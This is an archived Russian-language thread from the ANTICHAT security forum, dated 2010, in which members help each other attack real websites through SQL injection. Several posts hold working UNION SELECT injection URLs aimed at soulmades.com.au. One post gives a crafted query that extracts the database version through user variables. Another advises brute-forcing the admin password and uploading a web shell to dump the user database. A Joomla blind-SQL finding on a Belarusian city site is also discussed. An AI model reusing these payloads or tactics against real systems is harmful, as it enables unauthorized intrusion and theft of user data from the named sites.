ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.06.2010, 12:25
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от durito
durito said:
Gorev
брутом тянуть базу юзеров это анреал
что бы тебе тянуть брутом базу юзверей..тебе надо добратся до таблички и до колонок сперва... так как я сказал что версия базы 4-я и информатион схемы нет..так что подбери сначала имена табличек и колонок нужные..и только потом думай про дамп базы...вариантов несколько..ты подбираешь пасс админа и через админку заливаешь шелл ..а там уже и доступ прямой к базе..либо используешь какую нибудь тулзу для скулей..например сипт или что быстрее будет, тулзу от Пашкелы...
|
|
|
24.06.2010, 15:12
|
|
Участник форума
Регистрация: 06.02.2006
Сообщений: 177
Провел на форуме:
1576821
Репутация:
88
|
|
Делаю сканирование на уязвимости, используя OWASP Joomla! Vulnerability Scanner v0.0.3-a.
Сообщение от None
Target : http://www.city.m ogilev.by
Сообщение от None
~1.0.x joomla.javascript.js revealed 1.0.12
~1.0.x moscode.xml revealed [1.0.14 - 1.0.15]
* The Exact version found is 1.0.12
Если верить скрипту, то
Сообщение от None
# 23
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&i d=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&i d=0'+and+'1'='2
Vulnerable? Yes
Я не понимаю как он понял, что можно провести Blind SQL в параметре id. |
|
|
|
24.06.2010, 15:30
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от Irdis
Irdis said:
Я не понимаю как он понял, что можно провести Blind SQL в параметре id.
а ты его спроси как он понял
|
|
|
|
24.06.2010, 16:01
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от durito
durito said:
http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75, 76,77,78,79,80+limit+0,1/*
проходит, но толку
Ты думаешь я просто так написал limit 1,1? Твой запрос по логике и должен проходить и выдать нам результат идентичный /index.php?ap=2956775
Сообщение от durito
durito said:
http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75, 76,77,78,79,80/*
в первом случае The profile is not active!
во-втором тоже самое
Если честно не смотрел твой сайт и вариантов тут может быть просто масса, но догадываюсь в чём проблема. Покажи мне как с помощью параметра передаваемого в гет ты можешь повлиять на контент страницы и я покажу тебе как сделать вывод Это типо пища для ума
|
|
|
|
24.06.2010, 16:09
|
|
Участник форума
Регистрация: 06.02.2006
Сообщений: 177
Провел на форуме:
1576821
Репутация:
88
|
|
Сообщение от None
а ты его спроси как он понял
он слишком болтливый.
Найти то что мне нужно займёт уйму времени (всего то пару тысяч строк кода на перле).
Может я не совсем точно выразился, меня не интересует как он нашёл, а если там injection. Я не вижу inj, но скрипт даёт повод для сомнений. Поэтому решил спросить у вас.
|
|
|
|
24.06.2010, 17:57
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от Irdis
Irdis said:
он слишком болтливый.
Найти то что мне нужно займёт уйму времени (всего то пару тысяч строк кода на перле).
Может я не совсем точно выразился, меня не интересует как он нашёл, а если там injection. Я не вижу inj, но скрипт даёт повод для сомнений. Поэтому решил спросить у вас.
не надо верить всем скриптам и программам..а лучше проверить все руками...
|
|
|
|
24.06.2010, 18:18
|
|
Новичок
Регистрация: 03.01.2009
Сообщений: 27
Провел на форуме:
367442
Репутация:
41
|
|
Блиииин)
Сейчас ковырял сайт, который durito выложил, нашел другую инъекцию, замутил оригинальный запрос, но забыл что там 4.0 и не работают подзапросы
Код:
Code:
http://www.soulmades.com.au/index.php?list=profile&method=modify_form&id=-1+union+select+@a:=mid(version(),1,1),find_in_set(@a,'a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z, ,.,-'),3,4,find_in_set(@a,'1,2,3,4,5,6,7,8,9,0'),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80
Мб кому-нибудь пригодится)
Определяем переменную @a:=mid(version(),1,1)
И в зависимости от ее значения, получаем номер символа в day (если принадлежит [a-z .-]), либо в Children (если принадлежит [0-9])
Префикс у таблиц скорее всего soul_, потому что есть таблица soul_photo
PS: наконец-то нашел хоть какое-нибудь применение пользовательских переменных в инъекциях) |
|
|
|
24.06.2010, 21:48
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
спасибо всем за советы, буду пробовать
|
|
|
|
24.06.2010, 22:29
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от Irdis
Irdis said:
он слишком болтливый.
Найти то что мне нужно займёт уйму времени (всего то пару тысяч строк кода на перле).
Может я не совсем точно выразился, меня не интересует как он нашёл, а если там injection. Я не вижу inj, но скрипт даёт повод для сомнений. Поэтому решил спросить у вас.
Очень часто этот скрипт ошибается, особенно когда нет ошибки при наборе неправильно/несуществуюешего урла
А проверить - да, только ручками, мало ли что скрипты выдают
|
|
|
|
25.06.2010, 19:26
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944
Репутация:
37
|
|
Наверное тупой вопрос, но подскажите как через SQL инъекцию вывести список баз данных на сервере? Ну INFORMATION_SCHEMA это ясно, а вот как узнать другие?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
